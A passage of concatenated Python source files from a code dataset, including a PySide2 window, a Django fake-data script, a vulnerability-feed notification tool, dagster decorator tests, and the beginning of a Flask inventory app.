self.create_menu()\n\n        self.setIcon()\n        # self.setIconModes()\n\n    def initUI(self):\n        # url = \"https://www.serebii.net/swordshield/pokemon/113.png\"\n        # response = requests.get(url,headers={\n        #     \"User-Agent\":\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36\"\n        # })\n        # img_data = response.content\n        # pixmap = QPixmap()\n        # pixmap.loadFromData(img_data)\n        # scaled = pixmap.scaled(QSize(100,100))\n        # piclabel = QLabel(self)\n        # piclabel.setGeometry(0,22,120,120)\n        # piclabel.setPixmap(scaled)\n\n        qlabel1 = QLabel('PySide2 is Great', self)\n        qlabel1.setGeometry(10,10,100,40)\n\n        exit_btn = QPushButton('Back', self)\n        exit_btn.setGeometry(10,70,100,40)\n\n    # Build the menu bar\n    def create_menu(self):\n        mainmenu = self.menuBar()\n        filemenu = mainmenu.addMenu(\"File\")\n\n    # The leftmost icon shown while the program is running\n    def setIcon(self):\n        appIcon = QIcon(\"pic.ico\")\n        self.setWindowIcon(appIcon)\n\n    def setgosubButton(self,ButtonName, ButtonText, ButtonX, ButtonY):\n        font = QFont()\n        font.setFamily('新細明體')  # PMingLiU\n        font.setPointSize(10)\n        font.setBold(True)\n        ButtonName = QPushButton(ButtonText, self)\n        ButtonName.setGeometry(ButtonX,ButtonY,90,26)\n        ButtonName.setFont(font)\n        ButtonName.setStyleSheet('QPushButton {background-color: #febc0a}')\n        # ButtonName.clicked.connect(self.gotoSub)\n\n    # def gotoSub(self):\n    #     self.goSub = goSub\n\n\nif __name__ == \"__main__\":\n    app = QApplication(sys.argv)\n\n    window = ShowDenWindow()\n    window.show()\n\n    sys.exit(app.exec_())\n","sub_path":"Main/Sub_ShowDen.py","file_name":"Sub_ShowDen.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"616602987","text":"import os\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'pro.settings')\n\nimport django\ndjango.setup()\n\n# populate the database with fake data\nimport random\nfrom fa.models import AccessRecord, Webpage, Topic\nfrom faker import Faker\n\nfakegen = Faker()\ntopics = ['search', 'social', 'market place', 'news','games']\n\ndef add_topic():\n    t = Topic.objects.get_or_create(top_name = random.choice(topics))[0]\n    t.save()\n    return t\n\n\ndef pop(N=5):\n\n    for entry in range(N):\n        top = add_topic()\n\n        fake_url = fakegen.url()\n        fake_date = fakegen.date_time()\n        fake_name = fakegen.company()\n\n        webpg = Webpage.objects.get_or_create(topic=top,url=fake_url,name=fake_name)[0]\n        acc_rec = AccessRecord.objects.get_or_create(name=webpg, date=fake_date)[0]\n\n\nif __name__ == '__main__':\n    print(\"populate data\")\n    pop(40)\n    print(\"completed\")\n","sub_path":"pro/pop.py","file_name":"pop.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"163186496","text":"\"\"\"The main entrypoint to vulnture.\"\"\"\n\nimport argparse\nimport configparser\nimport json\nimport logging\nfrom pathlib import Path\nimport sys\nfrom time import gmtime\n\nfrom project.modules.models import Asset, EmailNotification, VulnerabilitySource\nfrom project.plugins.assets import dynamodb\nfrom project.plugins.vulnfeeds import cisco_advisories, nvd_feed\n\n# Parse args\nparser = argparse.ArgumentParser(description='Kick off the various'\n                                 ' components of the vulnerability notification tool.')\nparser.add_argument('--table-name', help='DynamoDB table name')\nparser.add_argument('--vendor-key', help='DynamoDB vendor column name (key)')\nparser.add_argument('--product-key', help='DynamoDB product column name (key)')\nparser.add_argument('--test', action='store_true',\n                    help='Test with input data rather than asset DB')\nparser.add_argument('-v', '--verbose', action='count',\n                    help='Set the verbosity level (More v\\'s = higher verbosity)')\nargs = parser.parse_args()\n\n\ndef get_notifications(config):\n    \"\"\"Checks conf.ini for enabled notifications.\n\n    Parameters\n    ----------\n    config : configparser.ConfigParser\n        An instantiated ConfigParser referring to conf/conf.ini\n\n    Returns\n    -------\n    set\n        A set of Notification subclasses representing enabled notifications\n    \"\"\"\n    logger = logging.getLogger()\n    # Set to store all configured Notifications - in the future can use DB and\n    # web GUI instead - for now, updating notification settings requires\n    # modifying conf.ini before each runtime\n    configured_notifications = set()\n    try:\n        notifications = config['Notifications']\n    except KeyError as KE:\n        sys.exit('Failed to parse config section {}!'.format(KE))\n    # Check if email notifications enabled\n    if notifications.getboolean('email'):\n        try:\n            email_recipients = json.loads(notifications['EmailRecipients'])\n        except KeyError as KE:\n            sys.exit('Email notifications enabled, but no recipients set!')\n        # ignore numbers (e.g. 1, 2) in keys and just get the values we need\n        for value in email_recipients.values():\n            # list of email recipients\n            recipients = value['recipients'].split(',')\n            if 'selectors' in value:\n                # list of selectors\n                selectors = value['selectors'].split(',')\n            else:\n                # None implies send everything (no limitations)\n                selectors = None\n            smtp_server = notifications['SMTPServer']\n            sender = notifications['SMTPSender']\n            configured_notifications.add(\n                EmailNotification(\n                    smtp_server=smtp_server,\n                    sender=sender,\n                    recipients=recipients,\n                    selectors=selectors\n                )\n            )\n    return configured_notifications\n\n\ndef get_assets(config):\n    \"\"\"Checks conf.ini for enabled asset backends and ingests discovered\n    assets.\n\n    Parameters\n    ----------\n    config : configparser.ConfigParser\n        An instantiated ConfigParser referring to conf/conf.ini\n\n    Returns\n    -------\n    set\n        A set of Asset objects representing discovered assets\n    \"\"\"\n    logger = logging.getLogger()\n    # Set to store all discovered Assets - in the future can use DB and web\n    # GUI instead\n    discovered_assets = set()\n    # Check for configured backend(s) - only one initially, multiple in\n    # future release\n    try:\n        asset_backends = config['Asset Backends']\n    except KeyError as KE:\n        sys.exit('Failed to parse config section {}!'.format(KE))\n    if asset_backends.getboolean('dynamodb'):\n        # Get all assets from DynamoDB table and create Asset objects\n        logger.debug('Searching DynamoDB for assets...')\n        asset_set = dynamodb.retrieve_assets(\n            args.table_name, args.vendor_key, args.product_key)\n        for asset in asset_set:\n            # Get vendor and product names by splitting on colon\n            asset_values = asset.split(':')\n            vendor_name = asset_values[0]\n            raw_product_name = asset_values[1]\n            product = asset_values[2]\n            # NOTE: A bug will arise if any product names contain a pipe (|)!\n            # Get product name and keyword by splitting on pipe\n            product_keyword_values = product.split('|')\n            normalized_product_name = product_keyword_values[0]\n            # Check in case dynamodb.get_keywords() returned None\n            if len(product_keyword_values) > 1:\n                # keyword is used exclusively to search for false positives in\n                # Cisco vuln feed\n                # TODO: Find a clean way to separate this Cisco vuln specific\n                # field from Asset creation\n                keyword = product_keyword_values[1]\n                if keyword 
== 'keyword':\n keyword = normalized_product_name\n else:\n # Use product name as keyword if get_keywords() yields None\n keyword = normalized_product_name\n discovered_assets.add(\n Asset(\n vendor=vendor_name,\n product=normalized_product_name,\n raw_name=raw_product_name,\n keywords=keyword)\n )\n return discovered_assets\n\n\ndef get_vulnerability_sources(config):\n \"\"\"Checks conf.ini for sources of vulnerability alerts.\n\n Parameters\n ----------\n config : configparser.ConfigParser\n An instantiated ConfigParser referring to conf/conf.ini\n\n Returns\n -------\n set\n A set of VulnerabilitySource objects representing configured\n vulnerability alert sources\n \"\"\"\n logger = logging.getLogger()\n configured_vulnerability_sources = set()\n try:\n vulnerability_sources = config['Vulnerability Data Sources']\n except KeyError as KE:\n sys.exit('Failed to parse config section {}!'.format(KE))\n # Check if Cisco security advisories and alerts service enabled\n if vulnerability_sources.getboolean('Cisco'):\n configured_vulnerability_sources.add(\n VulnerabilitySource(\n applicable_vendors='Cisco',\n url='https://tools.cisco.com/security/center/publicationService.x'\n )\n )\n # Check if NVD feed enabled\n if vulnerability_sources.getboolean('NVD'):\n configured_vulnerability_sources.add(\n VulnerabilitySource(\n applicable_vendors='all',\n url='https://nvd.nist.gov/feeds/json/cve/1.0/nvdcve-1.0-modified.json.gz'\n )\n )\n return configured_vulnerability_sources\n\n\ndef get_vulnerabilities(config, assets):\n \"\"\"Searches configured vulnerability data sources for vulnerabilities\n related to discovered assets.\n\n Parameters\n ----------\n config : configparser.ConfigParser\n An instantiated ConfigParser referring to conf/conf.ini\n assets : set(Asset)\n A set of Asset objects representing discovered assets\n\n Returns\n -------\n set\n A set of Vulnerability objects representing asset vulnerabilities\n \"\"\"\n logger = logging.getLogger()\n detected_vulnerabilities = set()\n # TODO: this will eventually be removed and only kept in \n # get_vulnerability_sources once moving to fully object oriented\n try:\n vulnerability_sources = config['Vulnerability Data Sources']\n except KeyError as KE:\n sys.exit('Failed to parse config section {}!'.format(KE))\n # Check if Cisco security advisories and alerts service enabled\n if vulnerability_sources.getboolean('Cisco'):\n # Create dict to act as cache of normalized product names searched\n # paired to Vulnerabilities (set) returned in search\n search_cache = {}\n # Check only Cisco products\n logger.debug('Searching Cisco security advisories and alerts...')\n for asset in assets:\n if asset.vendor.lower() == 'cisco':\n # Cisco vuln feed should be searched once per product\n cisco_advisories.search(\n asset, search_cache, detected_vulnerabilities\n )\n # Check if NVD feed enabled\n if vulnerability_sources.getboolean('NVD'):\n # Check products by all vendors\n # NVD feed should be downloaded once, then queried once per product\n logger.debug('Searching recently modified NVD vulnerabilities...')\n nvd_feed.search(assets, detected_vulnerabilities)\n return detected_vulnerabilities\n\n\n# Parameters event and context are sent by the AWS Lambda service\ndef handler(event, context):\n # Remove AWS Lambda root logger handler\n logger = logging.getLogger()\n if logger.handlers:\n for handler in logger.handlers:\n logger.removeHandler(handler)\n\n # Get verbosity level from Lambda function event input\n if 'verbosity' in event:\n args.verbose = 
int(event['verbosity'])\n # Set log verbosity level\n if args.verbose:\n log_level = 50 - min((args.verbose-1) * 10, 50)\n # If log_level is set to NOTSET (0) here, it will delegate to the root\n # logger level, which is WARNING (30) by default. This is not what we\n # want if a user has set log_level to 5+ (highest level), so set to 1\n # instead of 0 to avoid this. Alternatively can set root logger to 0\n # via basicConfig above, but logging everything when a user doesn't\n # request any verbosity is also not desirable.\n log_level = 1 if log_level == 0 else log_level\n else:\n # Log nothing\n log_level = 60\n # Enable logging, use UTC rather than local date/time\n logging.Formatter.converter = gmtime\n logging.basicConfig(\n datefmt='%Y-%m-%dT%H:%M:%S',\n format='%(name)s | %(asctime)s.%(msecs)03dZ | %(levelname)s: %(message)s')\n logger.setLevel(log_level)\n logger.debug('main.py - {}'.format(__name__))\n\n # Parse config file\n logger.info('Parsing conf.ini...')\n config = configparser.ConfigParser()\n if not config.read('project/conf/conf.ini'):\n sys.exit('Failed to read conf.ini! Make sure that it exists and is '\n 'in the right location.')\n\n # Test, only call get_vulnerabilities() with test data\n TESTING = False\n if args.test:\n TESTING = True\n logger.info('Entering test mode...')\n vendor = input('Enter a vendor name: ')\n product = input('Enter a product name: ')\n keywords = input('Enter keyword (optional): ')\n asset = Asset(vendor, product, product, keywords)\n discovered_assets = {asset}\n get_vulnerabilities(config, discovered_assets)\n print(asset)\n for vuln in asset.vulnerabilities:\n print(vuln)\n for vuln in asset.vulnerabilities_unconfirmed:\n print(vuln)\n sys.exit('Finished testing')\n\n ### NOTIFICATIONS\n # Set of Notifications configured via conf/conf.ini\n logger.info('Getting configured notifications...')\n configured_notifications = get_notifications(config)\n\n ### ASSETS\n # Set of Assets discovered via configured Asset Backend(s)\n if not TESTING:\n try:\n # Check if Lambda event data is passed in\n if event and event['table_name'] and event['vendor_key'] and event['product_key']:\n args.table_name = event['table_name']\n args.vendor_key = event['vendor_key']\n args.product_key = event['product_key']\n except KeyError as KE:\n sys.exit('Expected event parameters not found - {}!'.format(KE))\n if not (args.table_name and args.vendor_key and args.product_key):\n sys.exit('You must pass in table name, vendor key, and product '\n 'key if not in test mode!')\n logger.info('Retrieving assets...')\n discovered_assets = get_assets(config)\n\n ### VULNERABILITY DATA SOURCES\n # Set of enabled VulnerabilitySources\n # TODO: consider this approach in future iteration\n #configured_vulnerability_sources = get_vulnerability_sources(config)\n\n ### VULNERABILITIES\n # TODO: consider this approach in future iteration\n #vulnerabilities = get_vulnerabilities(\n # configured_vulnerability_sources,\n # discovered_assets)\n logger.info('Getting vulnerabilities...')\n discovered_vulnerabilities = get_vulnerabilities(config, discovered_assets)\n\n # Relevant vulnerabilities found, send notification(s)\n if discovered_vulnerabilities:\n logger.info('Preparing notifications to send...')\n for configured_notification in configured_notifications:\n for vuln in discovered_vulnerabilities:\n configured_notification.message += str(vuln)\n configured_notification.send()\n # No relevant vulnerabilities discovered, do nothing\n else:\n logger.info('No relevant vulnerabilities 
discovered, exiting.')\n\n\ndef main():\n handler(dict(), None)\n\n\nif __name__ == '__main__':\n try:\n # Parameters event and context are sent by the AWS Lambda service\n main()\n except KeyboardInterrupt:\n print()\n","sub_path":"code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"620685967","text":"import os\nimport distutils.util\nfrom tzlocal import get_localzone\n\nfrom app.version import __version__\n\n\nclass Config:\n SECRET_KEY = os.environ.get('SECRET_KEY', default='super-secret-phrase')\n TIMEZONE = get_localzone()\n\n PORTAL_SETTINGS = {\n 'host': os.environ.get('PORTAL_HOST', default='localhost'),\n 'client': os.environ.get('PORTAL_CLIENT', default=None),\n 'password': os.environ.get('PORTAL_PASSWORD', default=None),\n 'verify': distutils.util.strtobool(os.environ.get('PORTAL_VERIFY', default='True'))\n }\n\n MONGODB_SETTINGS = {\n 'db': os.environ.get('MONGODB_DB', default='data_mgmt'),\n 'host': os.environ.get('MONGODB_HOST', default='localhost'),\n 'port': int(os.environ.get('MONGODB_PORT', default=27017)),\n }\n\n SWAGGER = {\n 'specs_route': '/docs/',\n 'title': 'dmg-tracking API Documentation',\n 'uiversion': 3,\n 'description': 'This page describes the RESTful API of the dmg-tracking '+\n 'microservice. All request parameters and the full response '+\n 'content for each endpoint is described.',\n 'termsOfService': '',\n \"version\": __version__\n }\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"201369566","text":"# -*- coding: utf-8 -*-\nimport os\n\nimport tensorflow as tf\nimport tensorflow_hub as hub\nfrom tensorflow.compat.v1 import ConfigProto, Session\nfrom tensorflow.compat.v1.keras.backend import set_session\n\nfrom utils import get_cpuinfo\n\nnum_cores, num_sockets = get_cpuinfo()\nos.environ[\"KMP_AFFINITY\"] = \"granularity=fine,verbose,compact,1,0\"\nos.environ[\"KMP_BLOCKTIME\"] = \"1\"\nos.environ[\"OMP_NUM_THREADS\"] = str(num_cores)\n\nset_session(\n Session(\n config=ConfigProto(\n intra_op_parallelism_threads=num_cores,\n inter_op_parallelism_threads=num_sockets,\n )\n )\n)\n\n\ndef init():\n global detector\n model = \"https://tfhub.dev/google/openimages_v4/ssd/mobilenet_v2/1\"\n model_path = \"./models/\"\n detector = hub.load(model_path).signatures[\"default\"]\n detector(tf.zeros([1, 256, 256, 3], dtype=tf.dtypes.float32, name=\"init\"))\n print(\"Loaded detector!\")\n","sub_path":"openfaas/ssd_mobilenet.py","file_name":"ssd_mobilenet.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"280039768","text":"import re\n\nimport pytest\nfrom dagster import (\n Any,\n DagsterInvalidDefinitionError,\n DagsterInvariantViolationError,\n DependencyDefinition,\n Field,\n InputDefinition,\n Output,\n OutputDefinition,\n PipelineDefinition,\n composite_solid,\n execute_pipeline,\n execute_solid,\n graph,\n lambda_solid,\n op,\n pipeline,\n solid,\n)\nfrom dagster.core.utility_solids import define_stub_solid\n\n# This file tests a lot of parameter name stuff, so these warnings are spurious\n# pylint: disable=unused-variable, unused-argument, redefined-outer-name\n\n\ndef test_no_parens_solid():\n called = {}\n\n @lambda_solid\n def hello_world():\n called[\"yup\"] = True\n\n result = 
execute_solid(hello_world)\n\n assert called[\"yup\"]\n\n\ndef test_empty_solid():\n called = {}\n\n @lambda_solid()\n def hello_world():\n called[\"yup\"] = True\n\n result = execute_solid(hello_world)\n\n assert called[\"yup\"]\n\n\ndef test_solid():\n @solid(output_defs=[OutputDefinition()])\n def hello_world(_context):\n return {\"foo\": \"bar\"}\n\n result = execute_solid(hello_world)\n\n assert result.success\n assert result.output_value()[\"foo\"] == \"bar\"\n\n\ndef test_solid_one_output():\n @lambda_solid\n def hello_world():\n return {\"foo\": \"bar\"}\n\n result = execute_solid(hello_world)\n\n assert result.success\n assert result.output_value()[\"foo\"] == \"bar\"\n\n\ndef test_solid_yield():\n @solid(output_defs=[OutputDefinition()])\n def hello_world(_context):\n yield Output(value={\"foo\": \"bar\"})\n\n result = execute_solid(hello_world)\n\n assert result.success\n assert result.output_value()[\"foo\"] == \"bar\"\n\n\ndef test_solid_result_return():\n @solid(output_defs=[OutputDefinition()])\n def hello_world(_context):\n return Output(value={\"foo\": \"bar\"})\n\n result = execute_solid(hello_world)\n\n assert result.success\n assert result.output_value()[\"foo\"] == \"bar\"\n\n\ndef test_solid_with_explicit_empty_outputs():\n @solid(output_defs=[])\n def hello_world(_context):\n return \"foo\"\n\n with pytest.raises(DagsterInvariantViolationError) as exc_info:\n result = execute_solid(hello_world)\n\n assert (\n \"Error in solid hello_world: Unexpectedly returned output foo of type \"\n \". Solid is explicitly defined to return no results.\"\n ) in str(exc_info.value)\n\n\ndef test_solid_with_implicit_single_output():\n @solid()\n def hello_world(_context):\n return \"foo\"\n\n result = execute_solid(hello_world)\n\n assert result.success\n assert result.output_value() == \"foo\"\n\n\ndef test_solid_return_list_instead_of_multiple_results():\n @solid(output_defs=[OutputDefinition(name=\"foo\"), OutputDefinition(name=\"bar\")])\n def hello_world(_context):\n return [\"foo\", \"bar\"]\n\n with pytest.raises(DagsterInvariantViolationError) as exc_info:\n result = execute_solid(hello_world)\n\n assert \"unexpectedly returned output ['foo', 'bar']\" in str(exc_info.value)\n\n\ndef test_lambda_solid_with_name():\n @lambda_solid(name=\"foobar\")\n def hello_world():\n return {\"foo\": \"bar\"}\n\n result = execute_solid(hello_world)\n\n assert result.success\n assert result.output_value()[\"foo\"] == \"bar\"\n\n\ndef test_solid_with_name():\n @solid(name=\"foobar\", output_defs=[OutputDefinition()])\n def hello_world(_context):\n return {\"foo\": \"bar\"}\n\n result = execute_solid(hello_world)\n\n assert result.success\n assert result.output_value()[\"foo\"] == \"bar\"\n\n\ndef test_solid_with_input():\n @lambda_solid(input_defs=[InputDefinition(name=\"foo_to_foo\")])\n def hello_world(foo_to_foo):\n return foo_to_foo\n\n the_pipeline = PipelineDefinition(\n solid_defs=[define_stub_solid(\"test_value\", {\"foo\": \"bar\"}), hello_world],\n name=\"test\",\n dependencies={\"hello_world\": {\"foo_to_foo\": DependencyDefinition(\"test_value\")}},\n )\n\n pipeline_result = execute_pipeline(the_pipeline)\n\n result = pipeline_result.result_for_solid(\"hello_world\")\n\n assert result.success\n assert result.output_value()[\"foo\"] == \"bar\"\n\n\ndef test_lambda_solid_with_underscore_input():\n # Document that it is possible for lambda_solid to take an arg that the decorator machinery\n # would otherwise think is a context.\n @lambda_solid()\n def emit_input(_):\n return _\n\n 
@lambda_solid\n def emit_five():\n return 5\n\n @pipeline\n def basic_lambda_pipeline():\n emit_input(emit_five())\n\n pipeline_result = execute_pipeline(basic_lambda_pipeline)\n\n result = pipeline_result.result_for_solid(\"emit_input\")\n\n assert result.success\n assert result.output_value() == 5\n\n\ndef test_lambda_solid_definition_errors():\n with pytest.raises(\n DagsterInvalidDefinitionError, match=re.escape(\"positional vararg parameter '*args'\")\n ):\n\n @lambda_solid(input_defs=[InputDefinition(name=\"foo\")])\n def vargs(foo, *args):\n pass\n\n\ndef test_solid_definition_errors():\n with pytest.raises(\n DagsterInvalidDefinitionError, match=re.escape(\"positional vararg parameter '*args'\")\n ):\n\n @solid(input_defs=[InputDefinition(name=\"foo\")], output_defs=[OutputDefinition()])\n def vargs(context, foo, *args):\n pass\n\n with pytest.raises(DagsterInvalidDefinitionError):\n\n @solid(input_defs=[InputDefinition(name=\"foo\")], output_defs=[OutputDefinition()])\n def wrong_name(context, bar):\n pass\n\n with pytest.raises(DagsterInvalidDefinitionError):\n\n @solid(\n input_defs=[InputDefinition(name=\"foo\"), InputDefinition(name=\"bar\")],\n output_defs=[OutputDefinition()],\n )\n def wrong_name_2(context, foo):\n pass\n\n @solid(\n input_defs=[InputDefinition(name=\"foo\"), InputDefinition(name=\"bar\")],\n output_defs=[OutputDefinition()],\n )\n def valid_kwargs(context, **kwargs):\n pass\n\n @solid(\n input_defs=[InputDefinition(name=\"foo\"), InputDefinition(name=\"bar\")],\n output_defs=[OutputDefinition()],\n )\n def valid(context, foo, bar):\n pass\n\n @solid\n def valid_because_inference(context, foo, bar):\n pass\n\n\ndef test_wrong_argument_to_pipeline():\n def non_solid_func():\n pass\n\n with pytest.raises(\n DagsterInvalidDefinitionError, match=\"You have passed a lambda or function non_solid_func\"\n ):\n PipelineDefinition(solid_defs=[non_solid_func], name=\"test\")\n\n with pytest.raises(\n DagsterInvalidDefinitionError, match=\"You have passed a lambda or function \"\n ):\n PipelineDefinition(solid_defs=[lambda x: x], name=\"test\")\n\n\ndef test_descriptions():\n @solid(description=\"foo\")\n def solid_desc(_context):\n pass\n\n assert solid_desc.description == \"foo\"\n\n\ndef test_any_config_field():\n called = {}\n conf_value = 234\n\n @solid(config_schema=Field(Any))\n def hello_world(context):\n assert context.solid_config == conf_value\n called[\"yup\"] = True\n\n result = execute_solid(\n hello_world, run_config={\"solids\": {\"hello_world\": {\"config\": conf_value}}}\n )\n\n assert called[\"yup\"]\n\n\ndef test_solid_required_resources_no_arg():\n @solid(required_resource_keys={\"foo\"})\n def _noop():\n return\n\n\ndef test_solid_config_no_arg():\n with pytest.raises(\n DagsterInvalidDefinitionError,\n match=\"'_noop2' decorated function requires positional parameter 'context',\",\n ):\n\n @solid(config_schema={\"foo\": str})\n def _noop2():\n return\n\n\ndef test_solid_docstring():\n @solid\n def foo_solid(_):\n \"\"\"FOO_DOCSTRING\"\"\"\n return\n\n @lambda_solid\n def bar_solid():\n \"\"\"BAR_DOCSTRING\"\"\"\n return\n\n @solid(name=\"baz\")\n def baz_solid(_):\n \"\"\"BAZ_DOCSTRING\"\"\"\n return\n\n @lambda_solid(name=\"quux\")\n def quux_solid():\n \"\"\"QUUX_DOCSTRING\"\"\"\n return\n\n @composite_solid\n def comp_solid():\n \"\"\"COMP_DOCSTRING\"\"\"\n foo_solid()\n\n @pipeline\n def the_pipeline():\n \"\"\"THE_DOCSTRING\"\"\"\n quux_solid()\n\n @op\n def the_op():\n \"\"\"OP_DOCSTRING\"\"\"\n\n @graph\n def the_graph():\n 
\"\"\"GRAPH_DOCSTRING\"\"\"\n the_op()\n\n assert foo_solid.__doc__ == \"FOO_DOCSTRING\"\n assert foo_solid.description == \"FOO_DOCSTRING\"\n assert foo_solid.__name__ == \"foo_solid\"\n assert bar_solid.__doc__ == \"BAR_DOCSTRING\"\n assert bar_solid.description == \"BAR_DOCSTRING\"\n assert bar_solid.__name__ == \"bar_solid\"\n assert baz_solid.__doc__ == \"BAZ_DOCSTRING\"\n assert baz_solid.description == \"BAZ_DOCSTRING\"\n assert baz_solid.__name__ == \"baz_solid\"\n assert quux_solid.__doc__ == \"QUUX_DOCSTRING\"\n assert quux_solid.description == \"QUUX_DOCSTRING\"\n assert quux_solid.__name__ == \"quux_solid\"\n assert comp_solid.__doc__ == \"COMP_DOCSTRING\"\n assert comp_solid.description == \"COMP_DOCSTRING\"\n assert comp_solid.__name__ == \"comp_solid\"\n assert the_pipeline.__doc__ == \"THE_DOCSTRING\"\n assert the_pipeline.description == \"THE_DOCSTRING\"\n assert the_pipeline.__name__ == \"the_pipeline\"\n assert the_op.__doc__ == \"OP_DOCSTRING\"\n assert the_op.description == \"OP_DOCSTRING\"\n assert the_op.__name__ == \"the_op\"\n assert the_graph.__doc__ == \"GRAPH_DOCSTRING\"\n assert the_graph.description == \"GRAPH_DOCSTRING\"\n assert the_graph.__name__ == \"the_graph\"\n\n\ndef test_solid_yields_single_bare_value():\n @solid\n def return_iterator(_):\n yield 1\n\n with pytest.raises(\n DagsterInvariantViolationError,\n match=re.escape(\"Compute function for solid return_iterator yielded a value of type <\")\n + r\"(class|type)\"\n + re.escape(\n \" 'int'> rather than an instance of Output, AssetMaterialization, or ExpectationResult. \"\n \"Values yielded by solids must be wrapped in one of these types. If your solid has a \"\n \"single output and yields no other events, you may want to use `return` instead of \"\n \"`yield` in the body of your solid compute function. If you are already using \"\n \"`return`, and you expected to return a value of type <\"\n )\n + r\"(class|type)\"\n + re.escape(\n \" 'int'>, you may be inadvertently returning a generator rather than the value you \"\n \"expected.\"\n ),\n ):\n result = execute_solid(return_iterator)\n\n\ndef test_solid_yields_multiple_bare_values():\n @solid\n def return_iterator(_):\n yield 1\n yield 2\n\n with pytest.raises(\n DagsterInvariantViolationError,\n match=re.escape(\"Compute function for solid return_iterator yielded a value of type <\")\n + r\"(class|type)\"\n + re.escape(\n \" 'int'> rather than an instance of Output, AssetMaterialization, or ExpectationResult. \"\n \"Values yielded by solids must be wrapped in one of these types. If your solid has a \"\n \"single output and yields no other events, you may want to use `return` instead of \"\n \"`yield` in the body of your solid compute function. If you are already using \"\n \"`return`, and you expected to return a value of type <\"\n )\n + r\"(class|type)\"\n + re.escape(\n \" 'int'>, you may be inadvertently returning a generator rather than the value you \"\n \"expected.\"\n ),\n ):\n result = execute_solid(return_iterator)\n\n\ndef test_solid_returns_iterator():\n def iterator():\n for i in range(3):\n yield i\n\n @solid\n def return_iterator(_):\n return iterator()\n\n with pytest.raises(\n DagsterInvariantViolationError,\n match=re.escape(\"Compute function for solid return_iterator yielded a value of type <\")\n + r\"(class|type)\"\n + re.escape(\n \" 'int'> rather than an instance of Output, AssetMaterialization, or ExpectationResult. \"\n \"Values yielded by solids must be wrapped in one of these types. 
If your solid has a \"\n \"single output and yields no other events, you may want to use `return` instead of \"\n \"`yield` in the body of your solid compute function. If you are already using \"\n \"`return`, and you expected to return a value of type <\"\n )\n + r\"(class|type)\"\n + re.escape(\n \" 'int'>, you may be inadvertently returning a generator rather than the value you \"\n \"expected.\"\n ),\n ):\n result = execute_solid(return_iterator)\n\n\ndef test_input_default():\n @lambda_solid\n def foo(bar=\"ok\"):\n return bar\n\n result = execute_solid(foo)\n assert result.output_value() == \"ok\"\n","sub_path":"python_modules/dagster/dagster_tests/core_tests/definitions_tests/decorators_tests/test_solid.py","file_name":"test_solid.py","file_ext":"py","file_size_in_byte":12719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"397012037","text":"from flask import Flask,render_template,url_for,redirect,request,flash,make_response\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy.sql import func,or_\nfrom datetime import datetime,date\nimport pdfkit\nconfig = pdfkit.configuration(wkhtmltopdf='C:\\\\Program Files\\\\wkhtmltopdf\\\\bin\\\\wkhtmltopdf.exe')\n\napp = Flask('__name__')\n\napp.config['SQLALCHEMY_DATABASE_URI']='sqlite:///inventory.db'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config[\"SECRET_KEY\"]=\"SECRETKEY_TEST\"\ndb = SQLAlchemy(app)\n\n\nclass Product(db.Model):\n\tid = db.Column(db.Integer,primary_key=True)\n\tname = db.Column(db.String(100),nullable=False)\n\tdate_created = db.Column(db.DateTime, default=datetime.utcnow)\n\tdate_updated = db.Column(db.DateTime, default=datetime.utcnow)\n\tdef __repr__(self):\n\t\treturn 'Product'+str(self.id)\n\nclass Location(db.Model):\n\tid = db.Column(db.Integer,primary_key=True)\n\tname = db.Column(db.String(100),nullable=False)\n\tdate_created = db.Column(db.DateTime, default=datetime.utcnow)\n\tdate_updated = db.Column(db.DateTime, default=datetime.utcnow)\n\tdef __repr__(self):\n\t\treturn 'Location'+str(self.id)\nclass ProductMovement(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n timestamp = db.Column(db.DateTime, default=datetime.utcnow)\n from_location = db.Column(db.String(100))\n to_location = db.Column(db.String(100))\n product_id = db.Column(db.Integer, nullable=False)\n product_name = db.Column(db.String(50), nullable=False)\n product_qty = db.Column(db.Integer, nullable=False)\n date_created = db.Column(db.DateTime, default=datetime.utcnow)\n date_updated = db.Column(db.DateTime, default=datetime.utcnow)\n Flag = db.Column(db.String(50),nullable=False)\n def __repr__(self):\n \treturn 'Movement'+str(self.id)\n\n@app.route('/')\n@app.route('/home')\ndef home():\n\tmessage=None\n\tinventory_details = get_data()\n\tif not inventory_details:\n\t\t\tmessage = \"Currently Data is unavailable.Add Now!\"\n\n\treturn render_template('index.html',details=inventory_details,message=message)\n\n\n@app.route('/download_pdf')\ndef download_pdf():\n\t\n\t\n\tinventory_details = get_data()\n\n\trendered =render_template('download_pdf.html',details=inventory_details)\n\tcss = ['main.css']\n\tpdf = pdfkit.from_string(rendered,False,configuration=config,css=css)\n\n\tresponse = make_response(pdf)\n\tresponse.headers[\"Content-Type\"] = \"application/pdf\"\n\tresponse.headers['Content-Dispostion'] ='inline; filename=output.pdf'\n\t\n\treturn response\n\n@app.route('/product', methods=['GET','POST'])\ndef products():\n\tif 
